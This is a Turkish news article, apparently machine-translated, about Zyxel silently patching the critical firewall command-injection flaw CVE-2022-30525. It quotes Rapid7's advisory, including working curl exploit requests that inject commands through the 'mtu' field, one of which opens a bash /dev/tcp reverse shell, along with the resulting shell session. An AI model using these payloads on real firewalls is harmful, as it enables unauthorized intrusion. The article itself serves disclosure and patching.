Zyxel, 9.8 önem derecesi ile komut enjeksiyon güvenlik açığını sessizce yamalıyor

Donanım üreticisi Zyxel, bilgisayar korsanlarına on binlerce güvenlik duvarı cihazını uzaktan kontrol etme yeteneği veren kritik bir güvenlik açığını düzelten bir güncellemeyi sessizce yayınladı.

Kimlik doğrulama gerektirmeden uzaktan komut enjeksiyonuna izin veren güvenlik açığı, olası 10 üzerinden 9,8 önem derecesine sahiptir. Etkilenen cihazlara basit HTTP veya HTTPS istekleri göndererek bu güvenlik açığından yararlanmak kolaydır. İstekler, bilgisayar korsanlarının komut göndermesine veya bilgisayar korsanlarının zaman içinde ayrıcalıklı erişimi korumasını sağlayan bir web kabuğu arayüzü açmasına izin verir.

Yüksek değerli, silaha dönüştürülmesi kolay, kimlik doğrulama gerektirmez

Güvenlik açığı, el değmeden sağlama olarak bilinen bir özellik sunan bir dizi güvenlik duvarını etkiler. Zyxel, cihazları küçük şube ve kurumsal merkez dağıtımlarında kullanılmak üzere pazarlamaktadır. Cihazlar VPN bağlantısı, SSL denetimi, web filtreleme, izinsiz giriş koruması ve e-posta güvenliği gerçekleştirir ve güvenlik duvarı üzerinden 5 Gbps’ye kadar aktarım sağlar. Shodan cihaz arama hizmeti, etkilenen 16.000’den fazla cihazın İnternet’e maruz kaldığını gösteriyor.

Etkilenen belirli cihazlar şunlardır:

Güvenlik açığı CVE-2022-30525 olarak izleniyor. Bunu keşfeden ve özel olarak Zyxel’e bildiren güvenlik firması Rapid7, cihazların VPN serisinin de ZTP’yi desteklediğini ancak diğer gerekli işlevleri içermedikleri için savunmasız olmadıklarını söyledi. içinde Perşembe günü yayınlanan tavsiyeRapid7 araştırmacısı Jake Baines şunları yazdı:

Etkilenen modeller, yönetici HTTP arabirimi aracılığıyla kimliği doğrulanmamış ve uzaktan komut enjeksiyonuna karşı savunmasızdır. Komutlar şu şekilde yürütülür: nobody kullanıcı. Bu güvenlik açığından yararlanılır. /ztp/cgi-bin/handler URI ve temizlenmemiş saldırgan girdisinin os.system yöntem lib_wan_settings.py. Güvenlik açığı bulunan işlevsellik, aşağıdakilerle ilişkili olarak çağrılır: setWanPortSt emretmek. Saldırgan, bilgisayara rastgele komutlar enjekte edebilir. mtu ya da data parametre.

Aşağıdaki örnekler (1) curl güvenlik duvarının bir ping 192.168.1.220 IP adresine, ardından (2) powershell sonuçları verir, (3) bir ters kabuğun ortaya çıkması ve (4) bir bilgisayar korsanının ters kabuk ile yapabileceği şeyler:

1. 1. curl -v --insecure -X POST -H "Content-Type: application/json" -d
      '{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
      :"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
      
      

   2. nobody   11040  0.0  0.2  21040  5152 ?        S    Apr10   0:00  \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL
      nobody   16052 56.4  0.6  18104 11224 ?        S    06:16   0:02  |   \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py
      nobody   16055  0.0  0.0   3568  1492 ?        S    06:16   0:00  |       \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1
      nobody   16057  0.0  0.0   2152   564 ?        S    06:16   0:00  |           \_ ping 192.168.1.220
      

   3. curl -v --insecure -X POST -H "Content-Type: application/json" -d '
      {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":
      "1","vlanid":"5","mtu":"; bash -c \"exec bash -i &>/dev/tcp/
      192.168.1.220/1270 <&1;\";","data":"hi"}' 
      /ztp/cgi-bin/handler
      

   4. [email protected]:~$ nc -lvnp 1270
      Listening on 0.0.0.0 1270
      Connection received on 192.168.1.1 37882
      bash: cannot set terminal process group (11037): Inappropriate ioctl for device
      bash: no job control in this shell
      bash-5.1$ id
      id
      uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
      bash-5.1$ uname -a
      uname -a
      Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
      Bash-5.1
      

Rapid7, Metasploit istismar çerçevesi için bir modül geliştirdi burada Bu, sömürü sürecini otomatikleştirir.

Baines, Rapid7’nin 13 Nisan’da Zyxel’i güvenlik açığından haberdar ettiğini ve iki tarafın 21 Haziran’da düzeltme de dahil olmak üzere koordineli bir açıklama sağlamayı kabul ettiğini söyledi. Araştırmacı, donanım üreticisinin Rapid7’den habersiz bir aygıt yazılımı güncellemesi yayınladığını söylemeye devam etti. 28 Nisan’da bu güvenlik açığını sessizce düzeltti. Zyxel, CVE numarasını ancak Rapid7’nin sessiz yama hakkında soru sorması ve bir açıklama yayınlamasının ardından Salı günü aldı. danışma Perşembe günü.

AttackerKB’ye göreGüvenlik açıkları hakkında bir kaynak olan CVE-2022-30525, silaha dönüştürülmesi kolay olduğu, kimlik doğrulama gerektirmediği ve savunmasız cihazların varsayılan kurulumunda yararlanılabildiği için tehdit aktörleri için yüksek değerdedir. Rapid7 temsilcileri, bu değerlendirmenin doğruluğuyla ilgili temel soruları yanıtlayacak durumda değildi.

Yöneticiler, otomatik güncellemeye izin vermek için varsayılan ayarları değiştirmedikçe yamayı manuel olarak uygulamalıdır. Güvenlik açığı bulunan güvenlik duvarlarından yalnızca biri olan ATP200 için yapılan bir Shodan sorgusu, açıkta kalan cihazların yalnızca yüzde 25’inin en son bellenimi çalıştırdığını gösterdiğinden, erken belirtiler yamanın geniş çapta dağıtılmadığı yönündedir.

Güvenlik duvarlarını etkileyen güvenlik açıkları, özellikle gelen ve giden trafiğin aktığı ağların dış kenarında bulundukları için ciddi olabilir. Birçok güvenlik duvarı, verileri şifrelenmeden önce de okuyabilir. Etkilenen bu cihazları kullanan ağları denetleyen yöneticiler, bu güvenlik açığına maruz kaldıklarını araştırmaya öncelik vermeli ve buna göre yama yapmalıdır.